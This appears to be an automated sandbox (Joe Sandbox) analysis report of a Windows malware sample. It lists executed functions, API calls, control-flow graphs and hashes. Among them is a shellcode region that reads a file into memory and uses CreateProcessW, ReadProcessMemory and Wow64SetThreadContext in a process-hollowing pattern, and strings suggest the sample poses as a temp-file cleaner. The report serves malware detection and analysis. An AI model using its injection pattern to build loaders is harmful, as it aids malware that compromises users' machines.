FreeLibrary 22573->22575 22574->22573 22575->22570 22577 413f96 try_get_function 5 API calls 22576->22577 22578 4140d1 22577->22578 22579 4140e9 TlsAlloc 22578->22579 22580 4140da 22578->22580 22580->22549 22581->22552 22582->22550 22584 425386 22583->22584 22585 40f69c 22583->22585 22584->22585 22587 41e8c9 22584->22587 22585->22479 22585->22540 22588 41e8d5 ___scrt_is_nonwritable_in_current_image 22587->22588 22599 417eba EnterCriticalSection 22588->22599 22590 41e8dc 22600 425607 22590->22600 22595 41e90b 22595->22584 22596 41e8f5 22614 41e819 GetStdHandle GetFileType 22596->22614 22598 41e8fa 22615 41e920 LeaveCriticalSection std::_Lockit::~_Lockit 22598->22615 22599->22590 22601 425613 ___scrt_is_nonwritable_in_current_image 22600->22601 22602 42561c 22601->22602 22603 42563d 22601->22603 22624 414cb1 14 API calls _Atexit 22602->22624 22616 417eba EnterCriticalSection 22603->22616 22606 425621 22625 414a43 39 API calls _memcpy_s 22606->22625 22608 41e8eb 22608->22598 22613 41e763 42 API calls 22608->22613 22609 425675 22626 42569c LeaveCriticalSection std::_Lockit::~_Lockit 22609->22626 22611 425649 22611->22609 22617 425557 22611->22617 22613->22596 22614->22598 22615->22595 22616->22611 22627 417f30 22617->22627 22619 425576 22639 4190b2 22619->22639 22620 425569 22620->22619 22634 41e49c 22620->22634 22624->22606 22625->22608 22626->22608 22632 417f3d ___crtLCMapStringA 22627->22632 22628 417f7d 22646 414cb1 14 API calls _Atexit 22628->22646 22629 417f68 RtlAllocateHeap 22630 417f7b 22629->22630 22629->22632 22630->22620 22632->22628 22632->22629 22645 419df3 EnterCriticalSection LeaveCriticalSection new 22632->22645 22647 41e1ea 22634->22647 22637 41e4d6 InitializeCriticalSectionAndSpinCount 22638 41e4c1 22637->22638 22638->22620 22640 4190e7 22639->22640 22641 4190bd HeapFree 22639->22641 22640->22611 22641->22640 22642 4190d2 GetLastError 22641->22642 22643 4190df __dosmaperr 22642->22643 22662 414cb1 14 API calls _Atexit 22643->22662 22645->22632 22646->22630 22648 41e216 22647->22648 22649 41e21a 22647->22649 22648->22637 22648->22638 22649->22648 22654 41e11f 22649->22654 22652 41e234 GetProcAddress 22652->22648 22653 41e244 __crt_fast_encode_pointer 22652->22653 22653->22648 22660 41e130 std::_Lockit::_Lockit 22654->22660 22655 41e1c6 22655->22648 22655->22652 22656 41e14e LoadLibraryExW 22657 41e169 GetLastError 22656->22657 22658 41e1cd 22656->22658 22657->22660 22658->22655 22659 41e1df FreeLibrary 22658->22659 22659->22655 22660->22655 22660->22656 22661 41e19c LoadLibraryExW 22660->22661 22661->22658 22661->22660 22662->22640 22664 4101ea GetStartupInfoW 22663->22664 22664->22484 22668 40f5a8 ___std_exception_copy 22665->22668 22666 40f5d9 22666->22488 22668->22666 22674 419df3 EnterCriticalSection LeaveCriticalSection new 22668->22674 22675 40feeb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 22668->22675 22676 40cc79 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 22668->22676 22672 401546 EnumSystemCodePagesA 22671->22672 22673 40f5f7 22672->22673 22674->22668 23540 410f80 52 API calls 2 library calls 23544 402f90 76 API calls 23546 426ba1 41 API calls 4 library calls 23438 4181a4 47 API calls 5 library calls

                                  Executed Functions

                                  Function 002408B7 Relevance: 6.4, APIs: 4, Instructions: 441COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 366 2408b7-2409c7 call 24005f call 240838 call 240073 * 8 388 2409ce-2409de 366->388 389 2409c9 366->389 392 2409e5-240a08 CreateFileW 388->392 393 2409e0 388->393 390 240e3d-240e40 389->390 394 240a0f-240a35 VirtualAlloc ReadFile 392->394 395 240a0a 392->395 393->390 396 240a37 394->396 397 240a3c-240a4f 394->397 395->390 396->390 399 240a55-240e22 397->399 400 240e27-240e36 call 24020a 397->400 403 240e38-240e3a ExitProcess 400->403
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocNumaVirtual
                                  • String ID:
                                  • API String ID: 4233825816-0
                                  • Opcode ID: 015ea6ec844dbfbb1b46b0e834846bebfcc0176ad037e33cc7ed8c3c18047927
                                  • Instruction ID: daae71057c741c33dbb49de795c18b2d592d167f894f56e73637942cad12b3c1
                                  • Opcode Fuzzy Hash: 015ea6ec844dbfbb1b46b0e834846bebfcc0176ad037e33cc7ed8c3c18047927
                                  • Instruction Fuzzy Hash: 1B127620D5D2D9ADDF06CBE994517FCBFB05E26202F0845C6E5E4F6283C13A839ADB25
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002407DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemInfo.KERNELBASE(?), ref: 002407F7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoSystem
                                  • String ID:
                                  • API String ID: 31276548-0
                                  • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                  • Instruction ID: 3719ef45d24630924a01786e39a02791583fbaae8522c1648bbb936b05ac5c8d
                                  • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                  • Instruction Fuzzy Hash: A1F0A771D2410CABDB0CEAB899856BE77ACDB48300F10457DE706E2141D534899046A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041024E Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00410253
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 111deb4e69d56eb0a367dc8dd8c649a31ca691a76bf32c0556da6b83136cd69b
                                  • Instruction ID: 8b1e4004ee17768b9f14f169c391b7f79f222f34161a18ddefd49df5cc21805c
                                  • Opcode Fuzzy Hash: 111deb4e69d56eb0a367dc8dd8c649a31ca691a76bf32c0556da6b83136cd69b
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403C80 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403C8E
                                  • _Yarn.LIBCPMTD ref: 00403C99
                                  • _Yarn.LIBCPMTD ref: 00403CA4
                                  • _Yarn.LIBCPMTD ref: 00403CAF
                                  • _Yarn.LIBCPMTD ref: 00403CBA
                                  • _Yarn.LIBCPMTD ref: 00403CC5
                                  • _Yarn.LIBCPMTD ref: 00403CD0
                                  • std::bad_exception::bad_exception.LIBCMTD ref: 00403CE3
                                    • Part of subcall function 00404170: std::exception::exception.LIBCONCRTD ref: 0040417E
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00403CF1
                                    • Part of subcall function 00410CD6: RaiseException.KERNEL32(?,?,?,0040CC95,?,?,?,?,?,?,?,?,0040CC95,?,0043D2D0), ref: 00410D35
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403CFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarn$std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                  • String ID: bad locale name
                                  • API String ID: 1308764326-1405518554
                                  • Opcode ID: f7dabbc8b9a2564522404b5fff6ad0cab2a04412fab3c0770b9d2aed4a3d2d0d
                                  • Instruction ID: fd4ad598886c6da8f32b9fbc51c7598e751e74d590a365a0d9cc1529a84deba6
                                  • Opcode Fuzzy Hash: f7dabbc8b9a2564522404b5fff6ad0cab2a04412fab3c0770b9d2aed4a3d2d0d
                                  • Instruction Fuzzy Hash: F301E170900108FBCB08EFE5DD92BAEB739AF44709F60006EE502372C2DA74AF509799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00240E41 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 22 240e41-240f11 call 24005f call 240073 * 7 call 240109 CreateFileW 41 240f17-240f22 22->41 42 240ff0 22->42 41->42 47 240f28-240f38 VirtualAlloc 41->47 43 240ff2-240ff7 42->43 45 240ffd-241002 43->45 46 240ff9 43->46 50 24101e-241021 45->50 46->45 47->42 49 240f3e-240f4d ReadFile 47->49 49->42 51 240f53-240f72 VirtualAlloc 49->51 52 241004-241008 50->52 53 241023-241028 50->53 54 240f74-240f87 call 2400da 51->54 55 240fec-240fee 51->55 56 241014-241016 52->56 57 24100a-241012 52->57 58 241035-24103d 53->58 59 24102a-241032 VirtualFree 53->59 64 240fc2-240fd2 call 240073 54->64 65 240f89-240f94 54->65 55->43 61 24101d 56->61 62 241018-24101b 56->62 57->50 59->58 61->50 62->50 64->43 71 240fd4-240fd9 64->71 66 240f97-240fc0 call 2400da 65->66 66->64 72 240fdf-240fea VirtualFree 71->72 73 240fdb-240fdc CloseHandle 71->73 72->50 73->72
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30), ref: 00240F07
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040), ref: 00240F31
                                  • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000), ref: 00240F48
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040), ref: 00240F6A
                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?,00000000,0000000E), ref: 00240FDC
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?), ref: 00240FE7
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?), ref: 00241032
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                  • String ID:
                                  • API String ID: 721982790-0
                                  • Opcode ID: 1fc8bc8e81ed70493e03acc8cad0cd475d1ad2cc991a5fa7e87ec9c4b6d62fc2
                                  • Instruction ID: 455a5017a8019b85f3a8d71376d294e8fd5e0c94a91765343d50aa5d3f2223c6
                                  • Opcode Fuzzy Hash: 1fc8bc8e81ed70493e03acc8cad0cd475d1ad2cc991a5fa7e87ec9c4b6d62fc2
                                  • Instruction Fuzzy Hash: 4F51B371E20319BBDB249FB4CC85FAEB778AF04710F105525FA41F7280EB7599908B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E11F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 74 41e11f-41e12b 75 41e1bd-41e1c0 74->75 76 41e130-41e141 75->76 77 41e1c6 75->77 79 41e143-41e146 76->79 80 41e14e-41e167 LoadLibraryExW 76->80 78 41e1c8-41e1cc 77->78 81 41e1e6-41e1e8 79->81 82 41e14c 79->82 83 41e169-41e172 GetLastError 80->83 84 41e1cd-41e1dd 80->84 81->78 86 41e1ba 82->86 87 41e174-41e186 call 4265d2 83->87 88 41e1ab-41e1b8 83->88 84->81 85 41e1df-41e1e0 FreeLibrary 84->85 85->81 86->75 87->88 91 41e188-41e19a call 4265d2 87->91 88->86 91->88 94 41e19c-41e1a9 LoadLibraryExW 91->94 94->84 94->88
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,D85DCB61,?,0041E22E,?,000000FF,00000000), ref: 0041E1E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: 26e6f5f3ec23ab39baad835987d749df8f6080b1a3dcd10f1b62566cd0fe6c2a
                                  • Instruction ID: db482fff968b2c07073929e9a6fbb895afb52f1d02c0f168ccec13eb267f7f5e
                                  • Opcode Fuzzy Hash: 26e6f5f3ec23ab39baad835987d749df8f6080b1a3dcd10f1b62566cd0fe6c2a
                                  • Instruction Fuzzy Hash: 0221F339A00221BBD7219B22EC54AAB37689B417A0F650522FD06A7390DB78ED41C6D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030F0 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 95 4030f0-403128 call 40caf9 call 404d30 call 4067e0 102 40312a 95->102 103 40312c-403130 95->103 104 403195-4031a9 call 40cb51 102->104 105 403132-403138 103->105 106 40313a-403142 call 406540 103->106 105->104 110 403147-40314d 106->110 111 403167-403192 call 40d3f8 110->111 112 40314f-403165 call 403e40 call 410cd6 110->112 111->104 112->104
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004030FB
                                  • int.LIBCPMTD ref: 0040310D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040319E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  • Opcode ID: 484487e77d38c6918bdd44bf77138bcdcc21915cbfe8e7e093fd4a89c2bc4538
                                  • Instruction ID: 1d609cfe017e767e3400ef9b6c535b8e005c8793f142d5297fcfe8255119a914
                                  • Opcode Fuzzy Hash: 484487e77d38c6918bdd44bf77138bcdcc21915cbfe8e7e093fd4a89c2bc4538
                                  • Instruction Fuzzy Hash: C8210E74D00108EBCB08DF95D981AEEBBB5AF48305F20826AE51577390D734AF41DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401440 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 159memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,0000172A,00003000,00000040,00000000,-02FAF080,00000000), ref: 0040152A
                                  • EnumSystemCodePagesA.KERNEL32(?,00000000), ref: 0040154C
                                  Strings
                                  • Temporary files deleted., xrefs: 00401621
                                  • No temporary files found., xrefs: 0040159D
                                  • temporary files found. Do you want to delete them? [Y/N] , xrefs: 004015D2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCodeEnumPagesSystemVirtual
                                  • String ID: temporary files found. Do you want to delete them? [Y/N] $No temporary files found.$Temporary files deleted.
                                  • API String ID: 1820785676-2215515840
                                  • Opcode ID: f7bda9f03cb8526571c4ed517181b8191f1cae25bee3d6a74cddce3d9628d361
                                  • Instruction ID: 4ce0347a455e2ce78b6b383f08221b4ccdaa3280c6ffb7ba17c8dde1a9c53ddb
                                  • Opcode Fuzzy Hash: f7bda9f03cb8526571c4ed517181b8191f1cae25bee3d6a74cddce3d9628d361
                                  • Instruction Fuzzy Hash: 8E51AEB0E04218ABCB04EBA6DC52BEEB7B4AF48704F10452EF502B72D1DB7D5905CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421DC1 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 177 421dc1-421dda 178 421df0-421df5 177->178 179 421ddc-421dec call 419096 177->179 181 421e02-421e28 call 424257 178->181 182 421df7-421dff 178->182 179->178 186 421dee 179->186 187 421f9e-421faf call 40fcf3 181->187 188 421e2e-421e39 181->188 182->181 186->178 189 421f91 188->189 190 421e3f-421e44 188->190 194 421f93 189->194 192 421e46-421e4f call 40fde0 190->192 193 421e5d-421e68 call 4190ec 190->193 192->194 202 421e55-421e5b 192->202 193->194 204 421e6e 193->204 197 421f95-421f9c call 40ef9b 194->197 197->187 205 421e74-421e79 202->205 204->205 205->194 206 421e7f-421e94 call 424257 205->206 206->194 209 421e9a-421eac call 41e55e 206->209 211 421eb1-421eb5 209->211 211->194 212 421ebb-421ec3 211->212 213 421ec5-421eca 212->213 214 421efd-421f09 212->214 213->197 215 421ed0-421ed2 213->215 216 421f86 214->216 217 421f0b-421f0d 214->217 215->194 219 421ed8-421ef2 call 41e55e 215->219 218 421f88-421f8f call 40ef9b 216->218 220 421f22-421f2d call 4190ec 217->220 221 421f0f-421f18 call 40fde0 217->221 218->194 219->197 231 421ef8 219->231 220->218 230 421f2f 220->230 221->218 232 421f1a-421f20 221->232 233 421f35-421f3a 230->233 231->194 232->233 233->218 234 421f3c-421f54 call 41e55e 233->234 234->218 237 421f56-421f5d 234->237 238 421f7e-421f84 237->238 239 421f5f-421f60 237->239 240 421f61-421f73 call 424311 238->240 239->240 240->218 243 421f75-421f7c call 40ef9b 240->243 243->197
                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 00421E46
                                  • __alloca_probe_16.LIBCMT ref: 00421F0F
                                  • __freea.LIBCMT ref: 00421F76
                                    • Part of subcall function 004190EC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00419465,?,?,?,00000003,00414846,?,004147B5,?,?,004149C4), ref: 0041911E
                                  • __freea.LIBCMT ref: 00421F89
                                  • __freea.LIBCMT ref: 00421F96
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                  • String ID:
                                  • API String ID: 1423051803-0
                                  • Opcode ID: 89db6ee394439e0a0cc8b5c91efdb2608f4b7ca28b2f3df7cd100b76722c822b
                                  • Instruction ID: 99a82e6aae5305e6a53d4475a8a1d8ed1395878dbb0c2ae742f109dfc4491a55
                                  • Opcode Fuzzy Hash: 89db6ee394439e0a0cc8b5c91efdb2608f4b7ca28b2f3df7cd100b76722c822b
                                  • Instruction Fuzzy Hash: B251E672700226AFDB205F62AD41EBB3BA9DF54758B56003FFD14D7260E779DC108668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0024020A Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 425COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 24020a-240225 call 24005f 249 240228-24022c 246->249 250 240244-240251 249->250 251 24022e-240242 249->251 252 240254-240258 250->252 251->249 253 240270-24027d 252->253 254 24025a-24026e 252->254 255 240280-240284 253->255 254->252 256 240286-24029a 255->256 257 24029c-24037a call 240073 * 8 255->257 256->255 274 240391 257->274 275 24037c-240386 257->275 277 240395-2403b1 274->277 275->274 276 240388-24038f 275->276 276->277 279 2403b3-2403b5 277->279 280 2403ba 277->280 281 240734-240737 279->281 282 2403c1-2403e9 CreateProcessW 280->282 283 2403f0-240409 282->283 284 2403eb 282->284 289 240410-24042d ReadProcessMemory 283->289 290 24040b 283->290 285 2406e8-2406ec 284->285 287 240731-240733 285->287 288 2406ee-2406f2 285->288 287->281 291 2406f4-2406ff 288->291 292 240705-240709 288->292 293 240434-24043d 289->293 294 24042f 289->294 290->285 291->292 295 240711-240715 292->295 296 24070b 292->296 299 240464-240483 call 241287 293->299 300 24043f-24044e 293->300 294->285 297 240717 295->297 298 24071d-240721 295->298 296->295 297->298 302 240723-240728 call 2411f2 298->302 303 24072d-24072f 298->303 310 240485 299->310 311 24048a-2404ab call 2413a1 299->311 300->299 304 240450-240456 call 2411f2 300->304 302->303 303->281 309 24045b-24045d 304->309 309->299 312 24045f 309->312 310->285 315 2404f0-240510 call 2413a1 311->315 316 2404ad-2404b4 311->316 312->285 323 240517-24052c call 2400da 315->323 324 240512 315->324 317 2404b6-2404e2 call 2413a1 316->317 318 2404eb 316->318 325 2404e4 317->325 326 2404e9 317->326 318->285 329 240535-24053f 323->329 324->285 325->285 326->315 330 240571-240575 329->330 331 240541-24056f call 2400da 329->331 333 240655-240671 call 241040 330->333 334 24057b-240589 330->334 331->329 341 240675-240696 Wow64SetThreadContext 333->341 342 240673 333->342 334->333 337 24058f-24059d 334->337 337->333 340 2405a3-2405c3 337->340 343 2405c6-2405ca 340->343 344 240698 341->344 345 24069a-2406a4 call 241141 341->345 342->285 343->333 346 2405d0-2405e5 343->346 344->285 352 2406a6 345->352 353 2406a8-2406ac 345->353 348 2405f7-2405fb 346->348 350 2405fd-240609 348->350 351 240638-240650 348->351 354 240636 350->354 355 24060b-240634 350->355 351->343 352->285 356 2406b4-2406b8 353->356 357 2406ae 353->357 354->348 355->354 359 2406c0-2406c4 356->359 360 2406ba 356->360 357->356 361 2406c6 359->361 362 2406cc-2406d0 359->362 360->359 361->362 363 2406d2-2406d7 call 2411f2 362->363 364 2406dc-2406e2 362->364 363->364 364->282 364->285
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D
                                  • API String ID: 0-2746444292
                                  • Opcode ID: 953a10cdce4c6a83f1728cbf0a3f9d21a9bb17b9ca19b7032a897fe3a5ff0788
                                  • Instruction ID: f4550d8c2a56d8fe79cc87e60d80cd9244a13cb68f14ed4ae281cf18853558f1
                                  • Opcode Fuzzy Hash: 953a10cdce4c6a83f1728cbf0a3f9d21a9bb17b9ca19b7032a897fe3a5ff0788
                                  • Instruction Fuzzy Hash: 0102E370D20209EFDB18DF94C985BADBBB5BF04305F204069E615BA291D7B4AEA0DF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414428 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 404 414428-41442f 405 414431-414439 call 4141a2 404->405 407 41443e-414443 405->407 408 414445-414454 407->408 409 41445a-41445f call 414464 407->409 408->405 410 414456-414458 408->410 412 414461-414463 409->412 410->412
                                  APIs
                                  • ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00414439
                                    • Part of subcall function 004141A2: try_get_function.LIBVCRUNTIME ref: 004141B7
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0041445A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_uninitialize_lockstry_get_function
                                  • String ID: `!D
                                  • API String ID: 2281893912-1253605976
                                  • Opcode ID: bf5090b05b53bf2620de1b88f0e275efcb8c49e0b65bdf8f539d136c4bb9f519
                                  • Instruction ID: 1e213cc090d7174af067c4877b04097e6a17ced4bf3fd0165bee738add91531c
                                  • Opcode Fuzzy Hash: bf5090b05b53bf2620de1b88f0e275efcb8c49e0b65bdf8f539d136c4bb9f519
                                  • Instruction Fuzzy Hash: DED05B73E0433011EC60161A6D0A7DB46155FD3F14FD60167FE1856293D54848C354EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406540 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 414 406540-406551 415 406553-406559 414->415 416 4065b6-4065be 414->416 415->416 417 40655b-40656c call 40f5a8 415->417 420 406593 417->420 421 40656e-40657c call 408df0 call 403c80 417->421 423 40659a-4065a8 420->423 428 406581-406591 call 403a00 421->428 423->416 425 4065aa-4065b1 call 404680 423->425 425->416 428->423
                                  APIs
                                  • new.LIBCMT ref: 0040655D
